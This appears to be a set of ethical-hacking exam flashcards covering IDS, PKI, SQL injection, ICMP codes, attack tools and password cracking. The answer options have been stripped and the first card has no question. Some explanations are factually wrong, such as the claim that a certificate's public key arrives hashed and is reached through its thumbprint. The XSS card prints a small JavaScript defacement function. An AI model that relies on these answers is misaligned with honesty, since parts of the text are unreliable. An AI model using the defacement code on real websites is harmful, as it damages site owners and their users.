Polymorphic virus A polymorphic virus is most likely to evade detection by a signature-based anti-virus application. This virus type changes its code every time it infects a system.

Which of the following is NOT a limitation of a signature-based network intrusion detection system (NIDS)?

Provides only user behavior measurement and analysis While a NIDS provides only user behavior measurement and analysis, this is NOT a limitation of a NIDS. This is the purpose of an IDS. A NIDS has some limitations. Network tunnels and encryption can defeat detection by a NIDS. A NIDS experiences a large number of false positives. Also, new attack types will not be detected by a NIDS until the attack signature is captured.

What item is contained in the digital certificate that enables the receiver of the certificate to send an encrypted email to the sender?

Public key While it is not the only item required that resides in the certificate, the public key is used to encrypt the session key that is used to encrypt the email that is sent to the sender of the certificate. There is also a hash value (called the thumbprint) and a hash algorithm (called the thumbprint algorithm) that will be required to access the public key, which will arrive in a hashed format.

Which documentation provides an ethical hacker with the scope of targets and allowed testing techniques and tools?

ROE The ROE (rules of engagement) documentation provides an ethical hacker the scope of targets and allowed testing techniques and tools. The ROE is guideline documentation for performing the penetration test, including allowed activities like port scanning, social engineering, and network sniffing, and restricted activities like password cracking and SQL injection attacks. It also includes specific IP address ranges, testing periods, contact information for the team and affected systems and networks, prevention measures for alerting law enforcement, and how collected information will be handled after testing.

Which statement best describes the purpose of incident management?

Restore systems to normal service operation as quickly as possible The statement that best describes the purpose of incident management is to restore all systems to normal service operation as quickly as possible. It should also prevent future recurrence of the incident. For example, if you discover a malware infection and you determine that an anti-malware update would have prevented this issue, you should ensure that the update is deployed to all devices as part of the incident management process. The process also includes removing the malware infection (incident response) and documenting the steps you took to ensure all systems are clean (incident handling).

Which type of access control is supported by standard routers?

Rule-based access control Rule-based access control, also known as access control lists (ACLs), is supported by standard routers based on MAC or IP addresses. Access control is a safeguard security requirement. Role-based access control uses roles. Users are assigned to these roles, and the roles are assigned specific permissions. Role-based access control is used mostly by applications.

You are reviewing the log files for your company's primary Web server. You notice that there are several instances where the following request is made: SELECT login_id, full_name FROM customers Which attack type could this represent?

SQL injection The SELECT statement could be an example of a SQL injection attack. SQL injection attacks include SQL statements, such as SELECT, CREATE TABLE, and DELETE TABLE statements.

Which statement is true about SSL?

SSL operates above the Transport layer. Secure Sockets Layer (SSL) operates above the Transport layer. Although it is often used in conjunction with Secure Hypertext Transfer Protocol (S-HTTP), SSL is not an active encryption standard. The latest version of SSL (version 3.0) is deprecated. Transport Layer Security (TLS) has replaced it. SSL is not protected against cipher-block chaining (CBC) attacks. TLS version 1.1 added this protection. SSL does not encrypt each message independently, as S-HTTP does. SSL encrypts the entire communication channel.

Which of the following statements regarding security policies is NOT true?

Security policies are technology specific. Security policies are NOT technology specific. Security policies usually contain general policies regarding security, such as that all devices should be protected by antimalware and updated regularly. Including technology-specific policies would mean that new policies would have to be added or policies would need to be changed each time new technology was adopted.

You need to exchange confidential information with a trusted partner. The partner indicates to you that he will issue certificates. These certificates are signed by the same entity that verifies the certificate's identity. Which term is used for the type of certificate issued by the partner?

Self-signed certificates The partner is issuing self-signed certificates. With self-signed certificates, the certificates are both signed and verified by the same entity. Self-signed certificates should be used for internal organizational needs. Do not use self-signed certificates for sensitive, public connections. If you do not want to buy an SSL certificate, you should at least set up your own certificate authority with its own root certificate. Signed certificates are those issued by a certification authority (CA). They definitely should be used for public connections. X.509 certificates are the standard digital certificates for a public key infrastructure (PKI). Online certificates are those issued by a PKI for online usage.

Which of the following scenarios could be prevented by using EFS?

Sensitive information was obtained from a stolen company laptop Encrypting File System (EFS) is a feature built into Windows that allows for encrypting sensitive data. This mechanism, which encrypts data on the laptop, makes it impossible to read the data if anyone steals the laptop.

You discover that an attacker has used filesnarf to attack your network. Which of the following best describes what this tool does?

Sniffs NFS traffic on the network Filesnarf sniffs Network File System (NFS) traffic on the network. The macof tool floods a switched LAN with random MAC addresses. Filesnarf and macof are both tools in the dsniff suite of tools.

Your company has hired an ethical hacker to assess your company's network security. He will need to perform packet sniffing and logging, in addition to detecting any network intrusions. Which tool will he most likely use?

Snort Snort includes sniffer, packet logger, and network intrusion detection system modes. Snort is an open-source network intrusion detection system (NIDS) that can analyze network traffic in real-time. Wireshark is a network protocol analyzer for sniffing and logging packets, but it is not a full-featured NIDS. AirSnort is a WEP encryption key cracker for 802.11b wireless networks, but does not provide network intrusion detection.

Your network has increasingly come under attack. Management has asked you to take measures to detect and prevent future attacks. You need to purchase a tool or device that provides intrusion detection, packet sniffing, and logging. Which tool should you recommend?

Snort You should recommend Snort because it provides three primary functions: intrusion detection, packet sniffing, and packet logging. Nmap does not provide intrusion detection. It performs network and security scans. It can identify what services a host is running, fingerprint the operating system and applications on a host, determine the firewall a host is using, or perform an inventory of a local network.

You have been hired as an ethical hacker by a small company. The company's network uses UTP cable that connects 45 devices to a central switch. Which type of network topology is implemented?

Star A star network is implemented. A star network consists of a central device, such as a switch, to which all devices connect. In a mesh topology, every device or host on the network connects to every other host on the network. This network provides redundancy. In a bus topology, all devices or hosts on the network connect to a single network backbone cable. This network topology usually uses coaxial cable. In a ring topology, all devices or hosts on the network connect to a ring of cable, with traffic flowing in one direction.

Which of the following is an attack on physical security?

Tailgating Tailgating, in which an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system, is an attack on physical security. It is also considered a form of social engineering in that it uses non-technical means to achieve its ends.

You routinely test network connectivity using the ping command. Recently, you noticed that a router discarded an ICMP packet and sent a time exceeded message to the source host. Which of the following conditions would cause this to occur?

The TTL value is 1, and the destination host is several hops away. When a router discards an ICMP packet and sends a time exceeded message to the source host, this is an indication that the destination is farther away than the TTL value allows. In this case, the TTL value is 1, meaning that you have one more hop (router) to which you can connect. If the destination host is several hops away, then a TTL value of 1 will not allow the packet to reach its destination.

Another member of your security team is confused about cross-site scripting (XSS) attacks. You explain how phishing attempts can use XSS to replace existing content on the webpage. She decides to write a simple JavaScript XSS defacement function. Which document object method(s) should you suggest she use? (Choose all that apply.)

The two most important document object methods for JavaScript XSS defacement attacks are getElementById() and getElementsByTagName(). The getElementById() method retrieves an element node based on its identifier, such as the field name, like username or password. The getElementsByTagName() method retrieves an array of element nodes based on the tag name like h1 or a. Using these two methods, an attacker can easily deface the website as follows: function defaceFirstHeader(){ document.getElementsByTagName("h1")[0].innerHTML = "YOU'VE BEEN HACKED!"; }

A team of developers is creating mobile apps that target Apple iOS devices. Which of the following vulnerabilities should they address when using Objective-C? (Choose all that apply.)

They should address code injection, buffer overflow, string formatting, and thread racing vulnerabilities when using Objective-C. Input validation is the best defense against code injection, buffer overflow, and string formatting vulnerabilities. Objective-C is object-oriented, so objects are stored in the heap, reducing the likelihood of stack-based overflows. Objective-C also provides objects like NSString to manipulate strings and prevent string-formatting vulnerabilities. Like most modern development environments, Objective-C supports multi-threading, so developers must ensure that they avoid thread race conditions by designing atomic actions and leveraging synchronization in code. Objective-C is also particularly prone to race conditions because of its complex signal-handling mechanism.

Each layer must be able to exist on a physically independent system
Each layer should exchange information only with the layers above and below it
There is a presentation layer, a logic layer, and a data layer
Which system architecture has the above characteristics?

Three-tier The three-tier design, one variation of N-tier system architecture, uses three layers of processes, with each layer located on a different logical system. Each tier performs a different and distinct role. The user utilizes a presentation layer for the user interface, which accesses middleware, where the business logic resides, which in turn accesses the actual data. Three-legged refers to a firewall with three interfaces: one to the LAN, one to the Internet, and another facing the DMZ.

What is the purpose of using the Mole tool?

To automate SQL injection attacks The purpose of using the Mole tool is to automate SQL injection attacks. DataThief is a program to extract (reverse engineer) data points from a graph.

During security testing, what is the purpose of analyzing the interrupts within a piece of software?

To ensure critical data is not changed on the system You should analyze interrupts within software to ensure critical data is not changed on the system. One of the ways that malware can execute malicious actions is by using processor interrupts or event callbacks. These event callbacks interrupt the processor to stop what it may have been doing, take an action, and then return to the application. Examining these callbacks can reveal hacking. For example, a callback for network service by the notepad.exe application makes no sense. This could indicate a malicious callback. A virus could also effectively hide by interrupting virus scans and returning a false result.

You are performing a ping sweep of a local subnet. Which reply message would you receive if routers are blocking ICMP?

Type 3/Code 13 A type 3 is a destination unreachable message. A code of 13 indicates that a response is administratively prohibited, which indicates a router is set to block ICMP. According to RFC792 and RFC1122, type 3 messages can have one of the following codes:
0 - Net Unreachable
1 - Host Unreachable
2 - Protocol Unreachable
3 - Port Unreachable
4 - Fragmentation Needed and Don't Fragment was Set
5 - Source Route Failed
6 - Destination Network Unknown
7 - Destination Host Unknown
8 - Source Host Isolated
9 - Communication with Destination Network is Administratively Prohibited
10 - Communication with Destination Host is Administratively Prohibited
11 - Destination Network Unreachable for Type of Service
12 - Destination Host Unreachable for Type of Service
13 - Communication Administratively Prohibited
14 - Host Precedence Violation
15 - Precedence cutoff in effect

You have 25 computers connected to a wireless access point that is providing an IP address in the 192.168.5.0/24 network and a default gateway address 192.168.5.1/24 to the clients. If the default gateway is not routing traffic sent to the gateway to a public IP address, how will clients be affected?

Unable to connect to the Internet, but able to connect to other wireless stations Clients will be unable to connect to the Internet, but can connect to other wireless stations. When the gateway is not routing traffic to a public IP address, connections to the Internet will not be possible but local connections will be. Since all of the wireless clients have IP addresses in the same subnet, they will have no problem communicating. But Internet traffic must eventually be routed to a public IP address before traffic can access the Internet.

How does a hybrid password attack work?

Uses a word list based on variations of dictionary words to discover the password A hybrid password attack uses a list of dictionary word variations to find passwords by mixing uppercase and lowercase letters, adding numbers, reversing the character order, slightly misspelling it and including special characters. Some examples include PaSSword, passWord123, drowssap, paswrd and p@$$w0rd. Password cracking tools like John the Ripper and Cain & Abel can perform hybrid password attacks.

Which standard provides guidelines for the responsible and open transfer of conventional arms and sensitive or dual-use military resources?

Wassenaar Arrangement The Wassenaar Arrangement, often mistakenly called the Wassenaar Agreement, is a multilateral export control agreement with 41 participating states, including many former Warsaw Pact countries. It promotes transparency and greater responsibility during transfers of conventional arms and dual-use goods and technologies. Common Criteria is an international security standard for IT products. This standard is a baseline for evaluating software functional requirements. The Rainbow Books are cybersecurity standards and guidelines published by the National Computer Security Center (NCSC). The ISO 27000 series was developed by the Joint Technical Committee of the International Organization for Standardization and the International Electrotechnical Commission. This standard explains the purpose of an Information Security Management System (ISMS).

Your company has decided to hire an ethical hacker to help identify issues with your company's network. Which of the following terms can also be used to describe this position?

White hat An ethical hacker can also be described as a white hat. A gray hat is a computer hacker or computer security expert whose ethical standards fall somewhere between purely altruistic (white hat) and purely malicious (black hat).

Which of the following is a common Service Oriented Architecture (SOA) vulnerability that can be addressed by filters and gateways?

XML denial of service issues A common SOA vulnerability is an XML denial of service, in which the attacker crafts an XML message with very large payloads, recursive content, excessive nesting, malicious external entities, or malicious DTDs (Document Type Definitions). It can be mitigated by using XML filters and XML gateways, and by ensuring that the XML parser in use is robust and the XML parsing process is not processor intensive.

An administrator has configured SMTP and HTTP services running on a FreeBSD server. She wants to allow standard email and web traffic across registered ports 25, 80, and 443. However, any unauthorized access should be logged and denied. Which daemon should you use for logging and simple access control?

tcpd You should use the tcpd daemon for logging and access control. The tcpd daemon is a FreeBSD implementation of the TCP Wrapper, which can monitor incoming service requests for services like Telnet, SMTP (25), FTP, HTTP (80) and HTTPS (443). The tcpd daemon can log and provide simple access control. This could prevent a malicious Telnet attack from using standard open ports for other services, like SMTP and HTTP.

As your company's ethical hacker, you often perform routine penetration tests to check the security for your company's network. Last week, an attacker posted details obtained through operating system fingerprinting about your company's servers. You need to perform the same type of check to verify what information is available. Which tool should you use?

www.netcraft.com You should use www.netcraft.com to perform operating system (OS) fingerprinting. This tool will provide a list of servers and the OSs running on them. The www.changedetection.com site provides change monitoring and notifications to users for specific Web sites. It does not provide OS fingerprinting information. The www.webextractor.com site extracts information from Web pages. It can harvest URLs, phone and fax numbers, and email addresses, as well as meta tag information and body text. It does not provide OS fingerprinting information. The www.whois.com site provides information on the ownership of specific domain names. It does not provide OS fingerprinting information.
